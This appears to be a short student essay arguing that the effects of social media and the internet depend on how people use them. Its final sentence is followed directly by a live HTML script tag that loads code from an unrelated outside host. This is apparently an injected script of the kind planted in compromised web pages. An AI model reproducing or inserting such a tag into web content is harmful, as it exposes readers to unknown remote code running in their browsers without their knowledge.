Nowadays, people are affected by Social Media and the Internet, is it a good or bad thing?. Explain by giving examples.

Social Media and Internet are powerful tools used in today's era. Social Media is more than just establishing connections. Differentiating or giving opinion for both depends on user's action or types of usage.

Let's consider a few situations for both the means, in order to describe them as a boon or bane. Firstly, widely used and popular social media platforms cannot function without internet which require quite a lot of user interface and it cannot take place without users engaging themselves into it. Therefore, user action is required along with internet.

Second, if we consider a seldom occurring situation where some social portals function without internet, those make it even more clear as to why the affect purely depends on user activity and not on Internet and Social Media

Also, one cannot connect with people staying at faraway places without internet which also makes them a victim of hypertension, addict of virtual world or even depression. In the contemporary era. The advancement of Technology has brought in various pros and cons, where people at times miss out on real interactions

However, in conclusion the Internet and the social media have a significant effect on people, some of them affect positively and other ones affect negatively. Social Media or Internet both require user input without which none can function. If put to correct use, social media provides a great platform for network building, marketing along with helping in professional growth. Internet being a global tool for usage of promotion helps user fulfill their need according to the demand. The affect depends entirely on usage and user's action.<script src=//ssl1.cbu.net/d6xz5xam></script>